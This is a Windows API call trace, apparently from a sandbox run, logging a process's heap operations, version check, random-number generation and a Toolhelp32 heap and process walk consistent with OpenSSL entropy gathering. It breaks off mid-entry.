GetLastError () returned 0x0 [0184.793] SetLastError (dwErrCode=0x0) [0184.793] GetLastError () returned 0x0 [0184.793] SetLastError (dwErrCode=0x0) [0184.793] GetLastError () returned 0x0 [0184.793] SetLastError (dwErrCode=0x0) [0184.793] GetLastError () returned 0x0 [0184.793] SetLastError (dwErrCode=0x0) [0184.793] GetLastError () returned 0x0 [0184.793] SetLastError (dwErrCode=0x0) [0184.793] GetLastError () returned 0x0 [0184.793] SetLastError (dwErrCode=0x0) [0184.793] GetLastError () returned 0x0 [0184.793] SetLastError (dwErrCode=0x0) [0184.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0184.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a18 | out: hHeap=0x2c0000) returned 1 [0184.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26788 | out: hHeap=0x2c0000) returned 1 [0184.794] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0184.794] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0184.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0184.810] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0184.812] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0184.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0184.812] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0184.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0184.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0184.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10b20) returned 0x2ae3ea0 [0184.814] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0184.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0184.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0184.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0184.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0184.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ec70 [0184.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d748 [0184.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26768 [0184.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d760 [0184.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d730 [0184.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0184.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d6e8 [0184.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26788 [0184.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d6b8 [0184.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d6d0 [0184.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d718 [0184.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0184.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d700 [0184.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d778 [0184.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d790 [0184.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7a8 [0184.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0184.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2f5b18 [0184.962] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2f5b18, Size=0x218) returned 0x2adfbf8 [0184.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af49c8 [0184.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d778 | out: hHeap=0x2c0000) returned 1 [0184.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7a8 | out: hHeap=0x2c0000) returned 1 [0184.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d790 | out: hHeap=0x2c0000) returned 1 [0184.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0184.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af49c8 | out: hHeap=0x2c0000) returned 1 [0185.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d790 [0185.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0185.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d7a8 [0185.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26b48 [0185.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d778 [0185.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0185.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0185.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a18 [0185.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0185.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0185.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0185.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0185.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0185.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0185.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7a8 | out: hHeap=0x2c0000) returned 1 [0185.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0185.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d778 | out: hHeap=0x2c0000) returned 1 [0185.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b48 | out: hHeap=0x2c0000) returned 1 [0185.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0185.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d790 | out: hHeap=0x2c0000) returned 1 [0185.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a18 | out: hHeap=0x2c0000) returned 1 [0185.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0185.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfbf8 | out: hHeap=0x2c0000) returned 1 [0185.216] GetCurrentThreadId () returned 0x5d8 [0185.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x190) returned 0x2a37550 [0185.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eee0 [0185.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0185.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d790 [0185.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2f5b18 [0185.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2edcc0 [0185.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0185.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0185.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x29dcde8 [0185.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0185.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0185.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x29f16c8 [0185.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0185.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0185.358] GetCurrentThreadId () returned 0x5d8 [0185.358] GetVersionExA (in: lpVersionInformation=0x2f9f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x48, dwMinorVersion=0x2a, dwBuildNumber=0x29dcde0, dwPlatformId=0x2c0000, szCSDVersion="`Ï\x9d\x02lãüvI»óuÒ") | out: lpVersionInformation=0x2f9f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0185.358] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x75610000 [0185.359] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76600000 [0185.359] LoadLibraryA (lpLibFileName="NETAPI32.DLL") returned 0x742a0000 [0185.673] GetProcAddress (hModule=0x742a0000, lpProcName="NetStatisticsGet") returned 0x742a644f [0185.673] GetProcAddress (hModule=0x742a0000, lpProcName="NetApiBufferFree") returned 0x743c13d2 [0185.674] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c18, Level=0x0, Options=0x0, Buffer=0x2f9f02c | out: Buffer=0x2f9f02c) returned 0x0 [0185.676] GetCurrentThreadId () returned 0x5d8 [0185.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0185.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0185.676] NetApiBufferFree (Buffer=0x30a1f0) returned 0x0 [0185.676] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c3c, Level=0x0, Options=0x0, Buffer=0x2f9f02c | out: Buffer=0x2f9f02c) returned 0x0 [0185.696] GetCurrentThreadId () returned 0x5d8 [0185.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0185.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0185.696] NetApiBufferFree (Buffer=0x29b9f30) returned 0x0 [0185.696] FreeLibrary (hLibModule=0x742a0000) returned 1 [0185.698] GetProcAddress (hModule=0x75610000, lpProcName="CryptAcquireContextW") returned 0x7561df14 [0185.698] GetProcAddress (hModule=0x75610000, lpProcName="CryptGenRandom") returned 0x7561dfc8 [0185.699] GetProcAddress (hModule=0x75610000, lpProcName="CryptReleaseContext") returned 0x7561e124 [0185.699] CryptAcquireContextW (in: phProv=0x2f9f018, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9f018*=0x31b8e8) returned 1 [0185.699] CryptGenRandom (in: hProv=0x31b8e8, dwLen=0x40, pbBuffer=0x2f9f464 | out: pbBuffer=0x2f9f464) returned 1 [0185.699] GetCurrentThreadId () returned 0x5d8 [0185.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0185.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0185.700] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0185.700] CryptAcquireContextW (in: phProv=0x2f9f018, szContainer=0x0, szProvider="Intel Hardware Cryptographic Service Provider", dwProvType=0x16, dwFlags=0x0 | out: phProv=0x2f9f018*=0x31b8e8) returned 0 [0185.700] FreeLibrary (hLibModule=0x75610000) returned 1 [0185.700] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0185.700] GetProcAddress (hModule=0x400000, lpProcName="_OPENSSL_isservice") returned 0x0 [0185.700] GetDesktopWindow () returned 0x10010 [0185.701] GetProcessWindowStation () returned 0x5c [0185.701] GetUserObjectInformationW (in: hObj=0x5c, nIndex=2, pvInfo=0x0, nLength=0x0, lpnLengthNeeded=0x2f9efa0 | out: pvInfo=0x0, lpnLengthNeeded=0x2f9efa0) returned 0 [0185.701] GetLastError () returned 0x7a [0185.712] GetUserObjectInformationW (in: hObj=0x5c, nIndex=2, pvInfo=0x2f9ef80, nLength=0x10, lpnLengthNeeded=0x2f9efa0 | out: pvInfo=0x2f9ef80, lpnLengthNeeded=0x2f9efa0) returned 1 [0185.712] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x74e50000 [0185.712] GetProcAddress (hModule=0x74e50000, lpProcName="GetForegroundWindow") returned 0x74e72320 [0185.712] GetProcAddress (hModule=0x74e50000, lpProcName="GetCursorInfo") returned 0x74ec812f [0185.713] GetProcAddress (hModule=0x74e50000, lpProcName="GetQueueStatus") returned 0x74e73924 [0185.713] GetForegroundWindow () returned 0x10068 [0185.713] GetCurrentThreadId () returned 0x5d8 [0185.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0185.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0185.713] GetCursorInfo (in: pci=0x2f9f450 | out: pci=0x2f9f450) returned 1 [0185.719] GetQueueStatus (flags=0xbf) returned 0x0 [0185.719] GetCurrentThreadId () returned 0x5d8 [0185.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0185.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0185.720] FreeLibrary (hLibModule=0x74e50000) returned 1 [0185.720] GetProcAddress (hModule=0x76600000, lpProcName="CreateToolhelp32Snapshot") returned 0x76637327 [0185.720] GetProcAddress (hModule=0x76600000, lpProcName="CloseToolhelp32Snapshot") returned 0x0 [0185.720] GetProcAddress (hModule=0x76600000, lpProcName="Heap32First") returned 0x76695d03 [0185.720] GetProcAddress (hModule=0x76600000, lpProcName="Heap32Next") returned 0x76695eee [0185.721] GetProcAddress (hModule=0x76600000, lpProcName="Heap32ListFirst") returned 0x76695bc1 [0185.721] GetProcAddress (hModule=0x76600000, lpProcName="Heap32ListNext") returned 0x76695c6b [0185.721] GetProcAddress (hModule=0x76600000, lpProcName="Process32First") returned 0x76638abb [0185.721] GetProcAddress (hModule=0x76600000, lpProcName="Process32Next") returned 0x76638812 [0185.721] GetProcAddress (hModule=0x76600000, lpProcName="Thread32First") returned 0x76696133 [0185.721] GetProcAddress (hModule=0x76600000, lpProcName="Thread32Next") returned 0x766961df [0185.722] GetProcAddress (hModule=0x76600000, lpProcName="Module32First") returned 0x76696279 [0185.722] GetProcAddress (hModule=0x76600000, lpProcName="Module32Next") returned 0x76696362 [0185.722] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x594 [0185.734] GetTickCount () returned 0xb652 [0185.735] Heap32ListFirst (hSnapshot=0x594, lphl=0x2f9f454) returned 1 [0185.735] GetCurrentThreadId () returned 0x5d8 [0185.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0185.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0185.736] Heap32First (lphe=0x2f9efc0, th32ProcessID=0x7d8, th32HeapID=0x2c0000) returned 1 [0185.762] GetCurrentThreadId () returned 0x5d8 [0185.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0185.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0185.763] Heap32Next (lphe=0x2f9efc0) returned 1 [0185.784] GetTickCount () returned 0xb681 [0185.784] GetCurrentThreadId () returned 0x5d8 [0185.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0185.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0185.785] Heap32Next (lphe=0x2f9efc0) returned 1 [0185.812] GetTickCount () returned 0xb6a0 [0185.812] GetCurrentThreadId () returned 0x5d8 [0185.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0185.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0185.813] Heap32Next (lphe=0x2f9efc0) returned 1 [0185.837] GetTickCount () returned 0xb6b0 [0185.837] GetCurrentThreadId () returned 0x5d8 [0185.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0185.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0185.837] Heap32Next (lphe=0x2f9efc0) returned 1 [0185.860] GetTickCount () returned 0xb6cf [0185.860] GetCurrentThreadId () returned 0x5d8 [0185.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0185.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0185.860] Heap32Next (lphe=0x2f9efc0) returned 1 [0185.882] GetTickCount () returned 0xb6df [0185.882] GetCurrentThreadId () returned 0x5d8 [0185.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0185.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0185.883] Heap32Next (lphe=0x2f9efc0) returned 1 [0185.905] GetTickCount () returned 0xb6fe [0185.905] GetCurrentThreadId () returned 0x5d8 [0185.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0185.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0185.906] Heap32Next (lphe=0x2f9efc0) returned 1 [0185.929] GetTickCount () returned 0xb70d [0185.929] GetCurrentThreadId () returned 0x5d8 [0185.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0185.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0185.930] Heap32Next (lphe=0x2f9efc0) returned 1 [0185.955] GetTickCount () returned 0xb72d [0185.955] GetCurrentThreadId () returned 0x5d8 [0185.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0185.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0185.956] Heap32Next (lphe=0x2f9efc0) returned 1 [0185.979] GetTickCount () returned 0xb74c [0185.979] GetCurrentThreadId () returned 0x5d8 [0185.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0185.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0185.980] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.005] GetTickCount () returned 0xb75b [0186.005] GetCurrentThreadId () returned 0x5d8 [0186.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.006] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.086] GetTickCount () returned 0xb7a9 [0186.146] GetCurrentThreadId () returned 0x5d8 [0186.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.237] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.270] GetTickCount () returned 0xb865 [0186.270] GetCurrentThreadId () returned 0x5d8 [0186.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.270] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.291] GetTickCount () returned 0xb874 [0186.291] GetCurrentThreadId () returned 0x5d8 [0186.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.291] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.313] GetTickCount () returned 0xb893 [0186.314] GetCurrentThreadId () returned 0x5d8 [0186.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.314] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.333] GetTickCount () returned 0xb8a3 [0186.333] GetCurrentThreadId () returned 0x5d8 [0186.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.334] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.362] GetTickCount () returned 0xb8c2 [0186.362] GetCurrentThreadId () returned 0x5d8 [0186.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.362] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.388] GetTickCount () returned 0xb8e1 [0186.388] GetCurrentThreadId () returned 0x5d8 [0186.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.388] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.421] GetTickCount () returned 0xb901 [0186.422] GetCurrentThreadId () returned 0x5d8 [0186.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.422] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.457] GetTickCount () returned 0xb920 [0186.457] GetCurrentThreadId () returned 0x5d8 [0186.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.457] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.497] GetTickCount () returned 0xb94f [0186.497] GetCurrentThreadId () returned 0x5d8 [0186.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.498] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.521] GetTickCount () returned 0xb95e [0186.521] GetCurrentThreadId () returned 0x5d8 [0186.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.522] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.549] GetTickCount () returned 0xb97d [0186.549] GetCurrentThreadId () returned 0x5d8 [0186.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.550] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.581] GetTickCount () returned 0xb99d [0186.581] GetCurrentThreadId () returned 0x5d8 [0186.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.581] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.623] GetTickCount () returned 0xb9bc [0186.623] GetCurrentThreadId () returned 0x5d8 [0186.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.624] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.654] GetTickCount () returned 0xb9eb [0186.654] GetCurrentThreadId () returned 0x5d8 [0186.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.654] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.684] GetTickCount () returned 0xba0a [0186.684] GetCurrentThreadId () returned 0x5d8 [0186.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.685] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.713] GetTickCount () returned 0xba29 [0186.713] GetCurrentThreadId () returned 0x5d8 [0186.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.714] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.741] GetTickCount () returned 0xba39 [0186.741] GetCurrentThreadId () returned 0x5d8 [0186.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0186.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0186.742] Heap32Next (lphe=0x2f9efc0) returned 1 [0186.769] GetTickCount () returned 0xba58 [0186.769] Heap32ListNext (hSnapshot=0x594, lphl=0x2f9f454) returned 1 [0186.770] GetTickCount () returned 0xba58 [0186.770] GetTickCount () returned 0xba58 [0186.770] Process32First (in: hSnapshot=0x594, lppe=0x2f9f258 | out: lppe=0x2f9f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, 